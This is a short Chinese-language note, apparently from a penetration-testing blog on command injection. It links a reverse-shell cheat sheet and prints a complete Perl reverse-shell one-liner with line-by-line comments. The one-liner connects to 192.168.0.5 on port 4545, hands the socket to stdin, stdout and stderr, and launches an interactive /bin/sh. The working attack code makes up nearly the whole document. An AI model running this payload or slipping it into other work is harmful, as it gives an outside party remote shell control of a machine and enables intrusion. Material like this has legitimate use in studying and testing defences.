渗透进阶·命令注入·方向shell表研究
https://github.com/security-cheatsheet/reverse-shell-cheatsheet 反向shell作弊表
perl -e 'use Socket;
$i="192.168.0.5"; # 目标 IP 地址
$p=4545; # 目标端口
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp")); # 创建 TCP 套接字
if (connect(S, sockaddr_in($p, inet_aton($i)))) { # 连接目标 IP 和端口
open(STDIN, ">&S"); # 将标准输入重定向到连接
open(STDOUT, ">&S"); # 将标准输出重定向到连接
open(STDERR, ">&S"); # 将标准错误重定向到连接
exec("/bin/sh -i"); # 执行 /bin/sh,启动交互式 shell
};
'

浙公网安备 33010602011771号